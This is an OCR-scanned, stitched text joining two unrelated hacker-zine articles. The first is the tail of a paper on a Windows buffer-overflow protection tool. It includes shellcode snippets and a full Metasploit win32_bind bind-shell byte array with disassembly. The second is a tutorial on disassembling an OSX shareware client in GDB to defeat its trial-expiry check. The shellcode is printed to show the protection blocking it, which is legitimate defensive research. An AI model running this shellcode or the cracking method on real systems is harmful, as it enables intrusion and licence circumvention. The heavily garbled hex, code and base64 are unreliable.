; EAX=imagebase of kernel32.d1l1l 


xor ebp,ebp ; zero the counter 

mov ebx, [eaxt+3ch] ; get pe header 

add ebx, eax ; normalize 

Kone STDP eee 

loop_it: 

mov edi, [ecx] 7 get one name 

add edi,eax ; normalize 

cmp dword ptr [edit4],’Acor’ ; is it GetP-rocA-ddress ?? :) 
jne @1 ; nope —-> jump to @L 


; yes it is 


add esi,ebp ; add out counter 
mov esi, [esi] ; get the address 
| 
---[I1] 
add esi,eax ; normalize 
int 3 ; ESI=address of GetProcAddress 
@1: 
<...snip...> 
: SNIP 


- Description for Pl and P2 


Following example is being catched when [I1] instruction is being 
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xecuted when it tries to read the address of GetProcAddress 

from array with function addresses. Since function addresses array 

is "protected" all references to it will cause access 

violation exception, which will be filtered by the mechanism (like in 
previous points). Shellcode catched, attack failed. 


import section parsing 


; SNIP 
;following example gets LoadLibraryA address from IAT 


IMAGEBASE equ 00400000h 


mov ebx, IMAGEBASE 
mov eax,ebx 


add eax, [eaxt+3ch] ; PE header 
mov edi, [eax+80h] ; import RVA 
| 
----[I1] 
add edi,ebx ; normalize 


xor ebp,ebp 


mov edx, [edit+10h] ; pointer to addresses 
| 
-—---[12] 
add edx,ebx ; normalize 
<...snip...> 
; SNIP 


- Description for Pl and P2 


After instruction marked as [I1] is executed, EDI should contain the 
import section RVA, why should? because since the protection is 
active import section RVA is faked. In next step (look at instruction 
[I2]) this will cause access violation exception (because of the fact 
that FAKED_IAT_RVA + IMAGEBASE = INVALID LOCATION) and the shellcode 
will be catched. Attack failed also in this case. 


There is also a danger that attacker can hardcode IAT RVA. For such 
cases import section array of function names is also protected. 
Look at following code: 


; SNIP 
<...snip...> 
@loop: 


mov eax, [esi] 


AKRAKRAKRARAARAKAA 


| 
=SELL] 


add eax, ebx 
add eax, 2 
cmp dword ptr [eax],’daoL’ ; is this LoadLibraryA? 


<0s SILDS. 20> 
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Instruction [I1] is trying to access memory which is not accessible 
(protection mechanism changed it) and in the result of 

this exception is generated. Protty filters the access violation 
and kills the shellcod this attack also failed. 


And the last example, some shellcode from metasploit.com: 


win32_bind by metasploit.com 


EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub 


(replace "data" with "data" from protty_example/sample_bo.c then 
recompile and run) 


unsigned char data[] = 
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97" 
"\x25\xaa\xb5\x83\xeb\xfc\xe2\xf4\x6b\x4£\x41\xfa\x7£\xdc\x55\x4a" 
"\x68\x45\x21\xd9\xb3\x01\x21\xf0\xab\xae\xd6\xb0\xef\x24\x45\x3e" 
"\xd8\x3d\x21\xea\xb7\x24\x41\x56\xa7\x6c\x21\x81\x1lc\x24\x44\x84" 
"\x57\xbc\x06\x31\x57\x51\xad\x74\x5d\x28\xab\x77\x7c\xd1\x91\xel" 
"\xb3\x0d\xd£\x56\xlc\x7a\x8e\xb4\x7c\x43\x21\xb9\xdc\xae\xf5\xa9" 
"\x96\xce\xa9\x99\xlc\xac\xc6\x91\x8b\x44\x69\x84\x57\x41\x21\xf5" 
"\xa7\xae\xea\xb9\x1lc\x55\xb6\x18\x1lc\x65\xa2\xeb\xff\xab\xe4\xbb" 
"\x7b\x75\x55\x63\xa6\xfe\xcc\xe6\xf1\x4d\x99\x87\xf£\x52\xd9\x87" 
"\xc8\x71\x55\x65\xff£\xee\x47\x49\xac\x75\x55\x63\xc8\xac\x4£\xd3" 
"\x16\xc8\xa2\xb7\xc2\x4f\xa8\x4a\x47\x4d\x73\xbc\x62\x88\xfd\x4a" 
"\x41\x76\x£9\xe6\xc4\x76\xe9\xe6\xd4\x76\x55\x65\xf1\x4d\xbb\xe9" 
"\xf1\x76\x23\x54\x02\x4d\x0e\xaf\xe7\xe2\xfd\x4a\x41\x4f£\xba\xe4" 
"\xc2\xda\x7a\xdd\x33\x88\x84\x5c\xc0\xda\x7c\xe6\xc2\xda\x7a\xdd" 
"\x72\x6c\x2c\xfc\xc0\xda\x7c\xe5\xc3\x71\xf£\x4a\x47\xb6\xc2\x52" 
"\xee\xe3\xd3\xe2\x68\xf3\xff\x4a\x47\x43\xc0\xd1\xf1\x4d\xc9\xd8" 
"\xle\xc0\xc0\xe5\xce\x0c\x66\x3c\x70\x4f£\xee\x3c\x75\x14\x6a\x46" 
"\x3d\xdb\xe8\x98\x69\x67\x86\x26\xla\x5£\x92\xle\x3c\x8e\xc2\xc7" 
"\x69\x96\xbc\x4a\xe2\x61\x55\x63\xcc\x72\x£8\xe4\xc6\x74\xc0\xb4" 
"\xc6\x74\xff£\xe4\x68\xf5\xc2\x18\x4e\x20\x64\xe6\x68\xf3\xc0\x4a" 
"\x68\x12\x55\x65\xlc\x72\x56\x36\x53\x41\x55\x63\xc5\xda\x7a\xdd" 
"\x67\xaf\xae\xea\xc4\xda\x7c\x4a\x47\x25\xaa\xb5"; 


Disassembly: 

0012FD68 90 NOP 

0012FD69 90 NOP 

O0012FD6A 90 NOP 

0012FD6B 90 NOP 

0012FD6C 90 NOP 

0012FD6D 90 NOP 

O0012FD6E 90 NOP 

0012FD6F 90 NOP 

0012FD70 90 NOP 

0012FD71 90 NOP 

0012FD72 90 NOP 

0012FD73 31C9 XOR ECX, ECX 

0012FD75 83E9 AF SUB ECX,-51 

0012FD78 D9EE FLDZ 

OO012FD7A D97424 F4 FSTENV (28-BYTE) PTR SS: [ESP-C] 
O012FD7E 5B POP EBX 

O012FD7F 8173 13 9725AAB5 XOR DWORD PTR DS: [EBX+13],B5AA2597 
0012FD86 83EB FC SUB EBX,-4 

O012FD89 “*E2 F4 LOOPD SHORT 0012FD7F ; DECODING LOOP 
decoded data: 

0012FD8B FC CLD 


0012FD8C 6A EB PUSH -15 
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O012FD8E 4F DEC EDI 

OO12FD8E E8 FOFFFFFE CALL 0012FD8D EY 
O012FD94 60 PUSHAD 

0012FD95 8B6C24 24 MOV EBP,DWORD PTR SS: [ESP+24] 
0012FD99 8B45 3C MOV EAX,DWORD PTR SS: [EBP+3C] 
O012FD9C 8B7CO05 78 MOV EDI,DWORD PTR SS: [EBP+EAX+78] 
0012FDA0 O1LEF ADD EDI,EBP 

0012FDA2 8B4F 18 MOV ECX,DWORD PTR DS: [EDI+18] 
OO12FDA5 8B5F 20 MOV EBX,DWORD PTR DS: [EDI+20] 
0012FDA8 O1EB ADD EBX, EBP 


[!] O0012FD8F (calls) -> 0012FD8D (jumps) -> 0012FDDE 

(PARSING PEB BLOCK ROUTINE) 

0012FDDE 31C0 XOR EAX, EAX 

0012FDE0 64:8B40 30 MOV EAX,DWORD PTR FS: [EAX+30] 

O0012FDE4 8B40 OC MOV EAX,DWORD PTR DS: [EAX+C] 

0012FDE7 8B70 1C MOV ESI,DWORD PTR DS: [EAX+1C] ; [!!-P1] 

O0012FDEA AD LODS DWORD PTR DS: [EST] ao TLE P 2?) 

[!!-Pl] - protty (P1) takeovers the program execution when instruction 
at O0012FDE7h (MOV ESI,DWORD PTR DS: [EAX+1C]) is being 
executed, application is terminated, attack failed. 

[!!-P2] - P2 works like above, but the execution is redirected when lodsd 
instruction is executed. 

--[ VII. Bad points (what you should know) - TODO 


I have tested Protty2 (P2) with: 


—- Microsoft Internet Explorer 
— Mozilla Firefox 

—- Nullsoft Winamp 

—- Mozilla Thunderbird 

— Winrar 

- Putty 

— Windows Explorer 


and few others applications, it worked fine with 2-5 module protected 
(the standard is 2 modules NTDLL.DLL and KERNEL32.DLL), with not much 
bigger CPU usage! You can define the number of protected modules etc. 
etc. to make it suitable for your machine/software. The GOOD point is 
that protected memory region is not requested all the time, generally 
only on loading new modules (so it don’t eat CPU a lot). 


However there probably are applications which will not be working stable 
with protty. I think decreasion of protection methods can make the 
mechanism more stable however it will also decrease the security level. 


Anyway it seems to be more stable than XP SP2 :)) I’m preparing for 
exams so I don’t really have much time to spend it on Protty, so while 
working with it remember this is a kind of POC code. 


!!! DEFINETLY IMPORTANT !!! 


—- add SEH all chain checker 
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-— code optimization, less code, more *sp mead 


—- add vectored exception handling checker 


- add some registry keys/loaders to inject it automatically to 
started application 


(if anybody want to play with Prottyl): 


- add some align calculation procedure for VirtualProtect, to describe 
region size more deeply. 


Anyway I made SAFE_MEMORY_MODE (new!), here is the description: 


When protty reaches the point where it checks the memory region 
which caused exception, it checks if it’s protected. 


Due to missing of align procedure for (VirtualProtect), Protty region 
comparing procedure can be not stable (well rare cases :)) - and 
to prevent such cases i made SAFE _MEMORY_MODE. 


In this case Protty doesn’t check if memory which caused exception 
is laying somewhere inside protected region table. Instead of this 
Protty gets actual protection of this memory address (Im using 
VirtualProtect - not the VirtualQuery because it fails on special 
areas). Then it checks that actual protection is set to 
PAGE_NOACCESS if so, Protty deprotects all protected regions and 
checks the protection again, if it was changed it means that 
requested memory lays somewhere inside of protected regions. 

The rest of mechanism is the same (i think it is even more 

better then align procedure, anyway it seems to work well) 


(you can turn on safe mode via editing the prot/conf.ine and rebuilding 
the library) 


-—-[ VIII. Last words 


In the end I would like to say there is a lot to do (this is a concept), 
but I had a nice time coding this little thingie. It is based on pretty 
new ideas, new technology, new stuffs. This description is short and not 
well documented, like I said better test it yourself and see the effect. 
Sorry for my bad english and all the *lang* things. If you got any 

comments or sth drop me an email. 


Few thanks fliez to (random order): 
- K.S.Satish, Artur Byszko, Cezary Piekarski, T, Bart Siedlecki, mcb 


"some birds werent meant to be caged, their feathers are just too bright." 
-— Stephen King, Shawshank Redemption 


--[ IX. References 


[1] - VirtualQuery API 
—- msdn.microsoft.com/library/ en-us/memory/base/virtualquery.asp 


[2] — MEMORY_BASIC_INFORMATION structure 
—- msdn.microsoft.com/library/en-us/ memory/base/memory_basic_ 
information_str.asp 


[3] - IsBadWritePtr API 
—- msdn.microsoft.com/library/ en-us/memory/base/isbadwriteptr.asp 


[4] - Detours library 
—- research.microsoft.com/sn/detours/ 
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Bypassing 3rd Party Windows Buffer Overflow Protection 


- http://www.phrack.org/phrack/62/p62-0x05_Bypassing_Win_ 
BufferOverflow_Protection.txt 


Defeating w2k3 stack protection 


http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection. 


Gaining important datas from PI 
http://vx.netlux.org/29a/29a-6/29a-6.224 


An In-Depth Look into the Win32 Portable 


EB under NT boxes 


- http://msdn.microsoft.com/msdnmag/issues/02/03/P 


Windows Heap Overflows 


- http://opensores.thebunker.net/pub/mirrors/black 


win-usa-04/bh-win-04 


litchfi 


ld/bh-win-04 


—- http://developer.intel.com/design/Pentium4/documentation.htm 


Executable File Format 


E2/default.aspx 


hat/presentations/ 


litchfield.pdf 


Technological Step Into Win32 Shellcodes 


—- http://www.astalavista.com//data/w32shellcodes.txt 


[6] - 
pdf 
7 ey 
8] - IA32 Manuals 
9 = 
(PARTZ2) 
[10] = 
[LL] = 
[12]- EPO: 


Entry-Point Obscuring 


- http://vx.netlux.org/29a/29a-4/29a-4.223 


--[ X. Code 


Library binary and source code attached to paper. 


http://pb.specialised.info 


—+= STAR 


<++> PROTT-PACKAG 
UESDBAOAAAAAAE 9 YwT TAAAAAAAAAAAAAAAAI 
FAAAAAgACEPCMocS5zkpAgAA 9wMAABCAAABO 
nR4dl1lTwW/7bMAw9LOD+gTvt0jr3YRiWbj0YaJsgzaVHWaY jorKkUXTS7OtH 
2U7Q09TObsGWKeu/ xkV4ulotP291mv3+Bh/put 969wC08rx+3D/ewftrXxt 3eb 
y 8ZyAf£N1+3+XQjdn2FI 
S8ZTxrai0MXlLYroBftX 
DJ3umXAGY4U0DCcSB4n 


L 


OF BASE64 CHUNK -— PROTTY 


E.ZIP.BAS 


E64 


Uh JSTyMC3pryqVvEI/ 
PPx/W9eP 9rny95xml1 


LIBRARY 


DrOhx9 


Also 


PACKAGI 


GJ 


stored on 


LAAAAUFUPVFOtUEFDSy90SwM 
Uk 9UVC1OQUNL 


5 


,01VU1LRSRUF 


1 a Ba 


ny f9dEJ5K+rlapqXxJC 
rOdxkUHMK2YIERhziiFTQO57k 
JkVpsYUQodNybaV/TbWwxV7B3qgMt 0Zjo4ueJoHrik 


BocuoyxlLCCxZNNSMWykUF 81FrgbUeaofkyY 4MELUJoDAJUvkmeEK6SHDKqJECP 


VjigGsiUzMYXClobmgpQLT4gCCbk 
DUtb/f£3zv/at+93 jLUARLTwObVg+GLNAouoixT 
AdOpYyOMi 3pOwwc2vZZ1Uhr+Zy6GVIME zd 
JGuhvv0opT JFAUWPJUR8ZeZIAJOpNaOPpZu 
PVqnE5x7Pe990RtCFtN4rGaDat2 
kdifxSryCF9mxbB10zBmSGYo 
D512uGDbGNSL4mF1+Y1lmoL9OSwM 
AABQUk 9UVC1QQUNLL3Byb3R0eS1 jdXJyZ1 
AAAAAAAAAAAAHGAAAFBST1RU 


3V77 


LVBBOOsvcH 


AwQUAAAACADAis 


EyoZ/a 


LWNicnJlbnOvYmluL3Byb3R0eS5SETEztwgtY 


PHgoOUAXiVBOOVAROFSIJ 
2YLSlaKkurZV2W2230zbVagqlAfWxXPnYRXy7d1+4 
YeacySQvUSAuQsgNCZD 
LIDECjVhMOoI006] 


pKaEKDboCwxKLakEl 


DgVADcpIM3Y9+1jgI1 


UZO 


2vGiJg/GyRBqDNOo 
U9zTYodpmIZpSMp1l 


TqQMkYlLfgJqwYi2QFWqwm 


+Xpfr80SOqdfTRTp]1 


LSQNriAsLMzXCzFhe 
XHJBLZZZOBohssJPhhhfkC20py6UJ0kKLYbOTKhCz 
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--[{ 1.0 - Introduction 


This article is a guide to taking apart OSX applications and 
reprogramming their inner structures to behave differently to their 
original designs. This will be explored while uncrippling a 
shareware program. While the topic will be tackled step by step, 

I encourage you to go out and try these things for yourself, on your 
own programs, instead of just slavishly repeating what you read here. 


This technique has other important applications, including writing 
patches for closed source software where the company has gone out of 
business or is not interested, malware analysis and fixing incorrectly 
compiled programs. 


It is assumed you have a little rudimentary knowledge in this area 
already - perhaps you have some assembly programming or you have some 
cracking experience on Windows or Linux. Hopefully you’ll at least 
know a little bit about assembly language - what it is, and how it 
basically works ( what a register is, what a relative jump is, etc. ) 
If you’ve never worked with PowerPC assembly on OSX before, you might 
want to have a look at appendix A before we set off. If you have some 
basic familiarity with GDB, it will also be very useful. 


This tutorial uses the following tools and resources the XCod 
Cocoa Documentation, which is included with the OSX developer tools, 

a PowerPC assembly reference ( I recommend IBM’s "PowerPC Microprocessor 
Family: The Programming Environments for 32-Bit Microprocessors" - you 
can get it off their website ), gcc, an editor and a hexeditor ( I use 
bvi ). You’ll also be using either XCode/Interface Builder or Steve 
Nygard’s "class-dump" and Apple’s "“otool". 


I’m no expert on this subject - my knowledge is cobbled 
together from time spent working in this area with Windows, then Linux and 
now OSX. I’m sure there’s lots in this article that could be done more 
correctly / efficiently / easily, and if you know, please write to me and 
discuss it! Already this article is seriously indebted to the excellent 
suggestions and hard work of Christian Klein of Teenage Mutant Hero Coders. 


I had a very hard time deciding whether or not to publish this article 
anonymously. Recently, my country has enacted ( or threatened to enact ) 
DMCA style laws that represent a substantial threat to the kinds of 
exploration and research that this document represents xploration and 
research which have important academic and corporate applications. I 
believe that I have not broken any laws in authoring this document, 
but the justice system can paint with a broad brush sometimes. 


Thanks for reading, 
<curious@progsoc.org> 


--[ 2.0 - The Target 
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The target is a shareware client for SFTP and FTP, which I was first 
exposed to after the automatic ftp execution controversy a few years ago 
( see - <http://www.tidbits.com/tb-issues/TidBITS-731.html#1nk4> ). Out 
of respect for the authors, I’m not going to name it explicitly, and 
the version analysed is now deprecated. 


--[ 3.0 - Attack Transcript 


The first step is to prompt the program to display the undesirable 
behavior we wish to alter, so we know what to look out for and change. 
From reading the documentation, I know that I have fifteen days of usage 
before the program will start to assert it’s shareware status - after 
that time period, I will be unable to use the Favourites menu, and 
sessions will be time limited. 


As I didn’t want to wait around fifteen days, I deleted the program 
preferences in ~/Library/Application Support/, and set the clock back 
one year. I ran the software, quit, and then returned the clock to 
normal. Now, when I attempt to run the software, I receive th xpired 
message, and the sanctions mentioned above take effect. 


Now we need to decide where we are to make the initial incision 
In the program. Starting at main() or even NSApplicationMain() ( 
which is where Cocoa programs ’begin’ ) is not always feasible in the 
large, object based and event driven programs that have become the norm 
in Cocoa development, so here’s what I’ve come up with after a few false 
starts. 


One approach is to attack it from the Interface. If you have a look 
inside the application bundle ( the .app file - really a folder ), you’ll 
most likely find a collection of nib files that specify the user interfac 
I found a nib file for the registration dialog, and opened it in Interface 
Builder. 


Inspecting the actions referred to there we find a promising sounding 
TBAction "validateRegistration:" attached to a class 
"RegistrationController". This sounds like a good place to start, but if 
the developers are anything like me, they won’t have really dragged their 
classes into IB, and the real class names may be very different. 


If you didn’t have any luck finding a useful nib file, don’t despair. 
If you have class-dump handy, run it on the actual mach-o executable 
( usually in <whatever>.app/Contents/MacOS/ ), and it will attempt to 
form class declarations for the program. Have a look around there for 
a likely candidate function. 


Now that we have some ideas of where to start, let’s fire up GDB 


and look a bit closer. Start GDB on the mach-o executable. Once loaded, 
let’s search for the function name we discovered. If you still don’t 
have a function name to work with ( due to no nib files and no 


class-dump ), you can just run "info fun" to get a list of functions 
GDB can index in the program. 


(gdb) info fun validateRegistration 

All functions matching regular expression "validateRegistration": 
Non-debugging symbols: 

0x00051830 -[StateController validateRegistration: ] 


"StateController" would appear to be the internal name for that 
registration controlling object referred to earlier. Let’s s 
what methods are registered against it: 


| (gdb) info fun StateController 

| All functions matching regular expression "StateController": 
| Non-debugging symbols: 
| 
| 


0x0005090c -—-[StateController init] 
0x00050970 +{[StateController sharedInstance] 
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Ox000509f8 -[StateController appDidLaunch] 

0x00050e48 -[StateController cancelRegistration: ] 

0x00050e8c -[StateController findLostNumber: ] 

0x00050efc -—-[StateController state] 

Ox00050fd0 -[StateController validState] 

0x00051128 -—-[StateController saveState:] 

0x000512e0 -[StateController appendState: ] 

0x00051600 -[StateController initState] 

0x0005165c -[StateController stateDidChange: ] 

0x00051830 -[StateController validateRegistration: ] 

Ox00051bd8 -[StateController windowDidLoad] 
"validState", having no arguments ( no trailing ’:’ ) sounds very 


promising. Placing a breakpoint on it and running the program shows 

it’s called twice on startup, and twice when attempting to possibly change 
registration state - this seems logical, as there are two possible 
sanctions for expired copies as discussed earlier. Let’s dig a bit 

deeper with this function. 


Here’s a commented partial disassembly I’ve tried to bring it down 
to something readable on 75 columns, but your mileage may vary. I’m 
mainly providing this for those unfamiliar with PPC assembly, and it’s 
summarized at the end. 


(gdb) disass 0x50fd0 
Dump of assembler code for function -—[StateController validState]: 
Ox00050fd0 <-[StateController validState]+0>: mflr r0 


# Copy the link register to ro. 


Ox00050fd4 <-[StateController validState]+4>: stmw roa 7/S20rL) 


Store r27, 128, r29, r30 and r31 in five consecutive words 
starting at rl - 20 ( Oxbfffe2bc ). 


Ox00050fd8 <-[StateController validState]+8>: addis r4,r12,4 


r4 = r12 + 4 || 16(0) 


|| = "concatenated", in this case with sixteen zeroes. 
this has the effect of shifting the "four" ( 100B ) 
into the high sixteen of the register. 


Ox00050fde <-[StateController validState]+12>: stw r0,8(r1) 


# Write r0O to rl + 8. 


Ox00050fe0 <-[StateController validState]+16>: mr E29; 63 


Copy r3 to r29. At the moment, this would contain 
the address of the object we’re being invoked on 
( a StateController instance ). 


O0x00050fe4 <-[StateController validState]+20>: addis r3,r12,4 


# As Ox50fd8, but into r3. 


O0x00050fe8 <-[StateController validState]+24>: stwu r1,-96(r1) 


Store Word With Update: 
"address" = rl - 96 
store rl to "address" 
rl = "address" 


O0x00050fec <-[StateController validState]+28>: mr r31,r12 


# Copy r1l2 to r31. 


16.txt Wed Apr 26 09:43:44 2017 4 

OxO00050ff0 <-[StateController validState]+32>: lwz r4,1620(r4) 
Load r4 with contents of memory address r4 + 1620 ( 0x91624 
r4 now contains 0x908980CC = c string, "sSharedInstance". 

OxO00050ff4 <-[StateController validState]+36>: Ilwz r3,5944 (r3) 
Load r3 with contents of memory address r3 + 5944 ( 0x92708 
r3 now contains 0x92b20 = objc object, describes itself as 
"Preferences". 
This seems to be an instance of the undocumented preferences 

f api used by mail and safari. Tut tut. 
Ox00050ff8 <-[StateController validState]+40>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 

ES [ Preferences sharedInstance ]; 
(gdb) po $r3 
<Preferences: 0x10d6c0> 

Ox00050ffc <-[StateController validState]+44>: lwz r0, 40 (r29) 
Load r29 + 40 into r0O. As you may recall, r29 was set 
at Ox50fe0 to be the StateController instance. Hence 
this offset refers to some kind of instance variable. 
In this case, it’s value is nil. Guess it hasn’t been 
assigned yet. My theory is that this function will be 
invoked several times on the same object and this, the 
first run through, will do initialization. 

0x00051000 <-[StateController validState]+48>: mr r27,x3 
Copy the shared instance ( herein reffered to as prefObject 


returned in O0x50ff8 to r27. 


0x00051004 <-[StateController validState]+52>: cmpwi cr7,r0,0 


Compare rO ( the first instance variable ( herein SC:1 ) ) 


with nil, store the result. 


(gdb) print /t $cr 


$19 = 100100000000000100001001000010 


cr7 occupies offset 21-24, 001B ( "equal" ). 
The CR’s can contain 100B ( "higher" ), 010B ( "lower" ) 
or 001B ( "equal" ). 


0x00051008 <-[StateController validState]+56>: 
bnet+ cr7,0x51030 <-[StateController validState]+96> 


Jump to +96 if the equal bit of cr7 is not set. 


It is, so we just continue on. 


0x0005100c <-[StateController validState]+60>: addis r4,r31,4 


As 0x50fd8, but into r4. Note that r3l1 is the new address 


of the r12 address used in both of those instances. I would 


say r3l1 contains the start of the table listing the 
fF message names available in this program. 


0x00051010 <-[StateController validState]+64>: lwz r4,5168 (r4) 


Load r4 + 5168 into r4. This turns out to be ac string, 


0x0005101 


"firstLaunch". 


4 <-[StateController validState]+68>: 


). 


yes 


) 
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bl 0x739d0 <dyld_stub_objc_msgSend> 


r3 = [ prefObject firstLaunch J; 

This turns out to be an NSDate object, in this case 
2003-09-19 23:30:10 +1000. We’ll refer to this as 
firstLaunchDate. 


0x00051018 <-[StateController validState]+72>: cmpwi cr7,r3,0 


Compare firstLaunchDate with nil, results to cr7. 


0x0005101c <-[StateController validState]+76>: stw r3,40 (r29) 


Store r3 ( firstLaunchDate ) to r29 + 40 - you’ll recall 
this as being the StateController local variable referred 
to Ox50ffc, SC:1. 


0x00051020 <-[StateController validState]+80>: 


beqt er7,0x51030 <-[StateController validState]+96> 
If the equal bit is set, jump to +96 - same location as 
at 0x51008 for successful loads. Not what I was expecting. 


0x00051024 <-[StateController validState]+84>: addis r4,r31,4 
0x00051028 <-[StateController validState]+88>: lwz r4,2472 (r4) 


As we did manage to load successfully, we fall through to 
here — load the message table and the string "retain". 


0x0005102c <-[StateController validState]+92>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 


# firstLaunchDate = [ firstLaunchDate retain ]; 


0x00051030 <-[StateController validState]+96>: Ilwz r3,40 (r29) 


# Here’s where the divergent paths rejoin - load r3 with 
# the SC:1. 


0x00051034 <-[StateController validState]+100>: cmpwi er7, 63,0 
0x00051038 <-[StateController validState]+104>: 
beqt er7,0x51070 <-[StateController validState]+160> 


Check to see if it’s nil, and if so, jump out to +160. 
This would catch the case where we jumped from 0x51020 - 
would have seemed to make more sense to jump directly. 


0x0005103c 
0x00051040 


[StateController validState]+108>: addis r4,r31,4 


<r 
<-[StateController validState]+112>: lwz r4,4976 (r4) 


tf Load the message table and the string "timeIntervalSinceNow". 


0x00051044 <-[StateController validState]+116>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 


r3 = [ firstLaunchDate timeIntervalSinceNow J; 


This message returns as an NSTimelInterval, which is a double. 
As a result, the function returns to fl instead of the usual 


r3. The result in my case is: 
(gdb) print $fl 

$21 = -31790371.620961875 
(gdb) print $f1/60/60/24 

$22 = -367.944115983355 


This seems as expected from what we did at the beginning. 


0x00051048 <-[StateController validState]+120>: addis riers 3 
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0x0005104c <- 
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Not sure what’s at r31 + 3 
symbol table, 


StateController validState]4 


Load double at r2 + 26880 into 


0x0000. 
and r2 is usually reserved for RTOC. 


It’s not the message 


t124>: lfd 
FO. 

fat zero. 
t+128>: fcmpu 
t132>: 


£0,26880 (r2) 


Perhaps r2 is a constants 


er7,f£1,£0 


cr7,0x51070 <-[StateController validState]+160> 


table. It ends up being a big 
0x00051050 <-[StateController validState]4 
0x00051054 <-[StateController validState]4 
blet+ 
Compare the time betw 


0x00051 
0x00051 
0x00051 
0x00051 


058 
05c 
060 
064 

bl 
0x00051068 
0x00051 


0x00051 


06c 
070 


0x00051074 <- 


if it’s less ( 


and it should b 


ss th 


7 nL 


was in the future! ) we jump to +160. 
StateController validState]+136>: addis 
StateController validState]+140>: lwz 
StateController validState]+144>: lwz 
StateController validState]+148>: 

0x739d0 <dyld_stub_objc_msgSend> 
StateController validState]+152>: li 
StateController validState]+156>: stw 
StateController validState]+160>: lwz 
# Load our ever present SC:1 into ro. 

[StateController validState]+164>: addis 
[StateController validState]+168>: addis 


0x00051078 <- 


# Load the message symbol 


O0x0005107c <- 


F ONE 


gdb 


ler val 


[StateControl 


is 4 more al 


session. 


Long 


, 


at +44. 


0x00051080 <-[StateController val 


# Load the message symbol 


0x00051084 <- 
0x00051088 <- 
bne- 


0x00051 
0x00051 


08c 
090 

bl 
094 
098 
09c 

bl 
0a0 
0a4 
0a8 
Oac 

bl 
0b0 
0b4 
0b8 


0x00051 
0x00051 
0x00051 


0x00051 
0x00051 
0x00051 
0x00051 


0x00051 
0x00051 
0x00051 


It turns out to be another NSDate, 
"2004-09-21 21:55:27 +1 


L000", 


idState]+172>: 


lidState]+176>: 


ls into r30. 


[StateController validState]+180>: 
[StateController validState]+184>: 
cr7,0x510cce <-[StateController 


ls into both r2 and r28. 


lwz 


this one is 
the time I started the current 


addis 


cmpwi 


n first invocation and now with zero, 
first invocation 


r4,r31,4 
r3,40(r29) 
r4,1836(r4) 


r0,0 
r0, 40 (r29) 
r0, 40 (r29) 


ro, c317.4 
r28,r31,4 


r3,44 (r29) 


Load another instance variable on the StateController - this 
We’1ll tag it as SC:2. 


r30,r31,4 


cr7,r0,0 


validState]+252> 


Compare SC:1 with 0, if it’s not equal, 
Which we do. 
StateController validState]+188>: lwz 
StateController validState]+192>: 
0x739d0 <dyld_stub_objc_msgSend> 
StateController validState]+196>: Ilwz 
StateController validState]+200>: Ilwz 
StateController validState]+204>: 
0x739d0 <dyld_stub_objc_msgSend> 
StateController validState]+208>: stw 
StateController validState]+212>: addis 
StateController validState]+216>: lwz 
StateController validState]+220>: 
0x739d0 <dyld_stub_objc_msgSend> 
StateController validState]+224>: lwz 
StateController validState]+228>: mr 
StateController validState]+232>: addis 


jump to +252. 


r4,5172 (r2) 


r4,1504 (r30) 
63,5924 (r28) 


r3,40(r29) 
r4,r31,4 
r4,2472 (r4) 


r5,40(r29) 
C3621 
r4,r31,4 
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0x000510be <-[StateController validState]+236>: lwz r4,5176 (r4) 
0x000510c0O <-[StateController validState]+240>: 

bl 0x739d0 <dyld_stub_objc_msgSend> 
0x000510c4 <-[StateController validState]+244>: li C3; 
0x000510c8 <-[StateController validState]+248>: 

b 0x51114 <-[StateController validState]+324> 
0x000510cc <-[StateController validState]+252>: lwz r4,5172 (r2) 


# Load r4 with r2 + 5172. r2 still has the message symbol 
# table from 0x51074. The string is "timeIntervalSincel970". 


0x000510d0 <-[StateController validState]+256>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 


r3 still contains SC:2 from 0x5107c, the time this instance was 
launched. 


fl = [ SC:2 timeIntervalSincel970 J]; 
fl = 1095767727.4292047 
£1/60/60/24/365 = 34.746566699302541 


0x000510d4 <-[StateController validState]+260>: lwz r4,1504 (r30) 


r30 still has the message symbol table. r4 gets 
"dateWithTimeIntervalSincel970:" 


0x000510d8 <-[StateController validState]+264>: lwz 63,5924 (r28) 


Last I saw of r28, it had the message symbol table in it 
as well, but +5924 seems to contain the NSDate class object. 


0x000510dce <-[StateController validState]+268>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 
r3 = [ NSDate dateWithTimeIntervalSincel970: S$f1 ] 
Since the first argument is a float, it will draw from fl - 


t which still has the seconds since 1970 to current invocation 
from 0x510d0. 
We end up with an exact copy of SC:2. We’1ll call it 
thisLaunchDate. 


0x000510e0 <-[StateController validState]+272>: addis r4,r31,4 


# Load the message symbol table into r4. 


0x000510e4 <-[StateController validState]+276>: mr E295 C3 
# Copy r3 to r29. 


0x000510e8 <-[StateController validState]+280>: mr Lae wpe Ae | 


Copy r27 to r3. When last sighted at 0x51000, this 
held the prefs shared object. 


0x000510ec <-[StateController validState]+284>: lwz r4,5168 (r4) 
+ Load string "firstLaunch" to r4. 


Ox000510f0 <-[StateController validState]+288>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 


r3 = [ prefObject firstLaunch J; 
As seen at 0x51014, the value returned from here was later 
stored in SC:1. 


0x000510f4 <-[StateController validState]+292>: addis r4,r31,4 


fF Load the message symbol table to r4. 
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0x000510f8 <-[StateController validState]+296>: mr G5,L3 
Move the NSDate just returned from prefObject to 
r5 ( second argument ). 
0x000510fc <-[StateController validState]+300>: mr r3; 629 
Copy r29 to r3 - r29 had the reconstituted NSDate 
'thisLaunchDate’ from 0x510dc. 
0x00051100 <-[StateController validState]+304>: lwz r4, 3456 (r4) 
# Load "isEqualToDate:" into r4. 
0x00051104 <-[StateController validState]+308>: 
bl 0x739d0 <dyld_stub_objc_msgSend> 
r3 = [ thisLaunchDate isEqualToDate: firstLaunchDate J]; 


That’s going to be a big zero unless 
you’ re running. 


it’s the first time 


0x00051108 <-[StateController validState]+312>: addic C2, 63,51 
r2 = x3 1 with carry flag. 
r2 will be set to max now. 
XER = 100B. 
0x0005110c <-[StateController validState]+316>: subfe COyt 2, 63 
subfe r0, r2, r3 = !( r2 + r3 + XER[ carry bit ] ) 
= !( max + 0+ 0 ) 
= !( max ) 
= 0 
